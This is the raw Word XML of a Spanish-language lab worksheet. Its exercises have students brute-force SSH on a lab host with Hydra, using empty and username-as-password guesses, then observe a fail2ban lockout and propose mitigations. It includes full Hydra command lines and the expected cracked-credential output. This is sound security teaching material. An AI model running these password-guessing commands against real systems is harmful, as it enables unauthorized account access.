    <w:p w14:paraId="20910C9E" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:pict w14:anchorId="44BEB53F">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="779DDD04" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5) Ejercicio </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ultra-sencillo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (prueba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> como contraseña y vacío)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34D790" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> entender opciones -e n y -e s (n = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>empty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve">, s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparación:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> SSH en 10.8.1.85 con usuario test y contraseña test (igual que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3EABEB" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -l test -P smalllist.txt -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -t 2 10.8.1.85 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> -V -o resultado5.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5632E9" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:t>Donde smalllist.txt puede ser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBD4A2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echo -e "1234\npassword\n" &gt; smalllist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76492955" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salida esperada (por la opción -e s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC3A3F4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[22][ssh] host: 10.8.1.85   login: test   password: test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F75AE11" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entregar:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> resultado5.txt y explicación de qué intentos adicionales hizo Hydra por -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3A7B5" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:pict w14:anchorId="633C140A">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="416582F3" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6) Ejercicio de seguridad: detectar y documentar bloqueo por intentos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D86F5" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> ver el efecto de un bloqueo (fail2ban, bloqueo por intentos) y cómo mitigarlo.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparación:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> SSH en 10.8.1.85 con fail2ban activo configurado para bloquear tras 3 fallos en 10 minutos. Usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>victim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> con contraseña </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>victimpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Comando (intencionalmente lento, 1 hilo):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F4750" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra -l victim -P shortlist.txt -t 1 10.8.1.85 ssh -V -o resultado6.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062F8788" w14:textId="77777777" w:rsidR="004D66CB" w:rsidRPr="004D66CB" w:rsidRDefault="004D66CB" w:rsidP="004D66CB">
      <w:r w:rsidRPr="004D66CB">
        <w:t>shortlist.txt incluye &gt;3 contraseñas incorrectas antes de la correcta para provocar bloqueo.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salida esperada:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> puede mostrar fallos y luego desconexiones/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>timeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> indicando bloqueo; resultado6.txt puede no mostrar la contraseña si el host fue bloqueado.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entregar:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D66CB">
        <w:t xml:space="preserve"> resultado6.txt, logs de fail2ban o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D66CB">
        <w:t>/log/auth.log que muestren el bloqueo, y 3 recomendaciones para mitigar fuerza bruta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CFE1B" w14:textId="77777777" w:rsidR="00DC63AA" w:rsidRDefault="00DC63AA"/>
    <w:sectPr w:rsidR="00DC63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AA"/>
    <w:rsid w:val="003F4713"/>
    <w:rsid w:val="004D66CB"/>
    <w:rsid w:val="00DC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0E02F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BA92B168-3006-400F-8501-7ECCE6641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3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3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3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3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3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3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3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3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3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3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605</Words>
  <Characters>3648</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>104</Lines>
  <Paragraphs>62</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HP</Company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2025-10-21T12:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-21T12:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>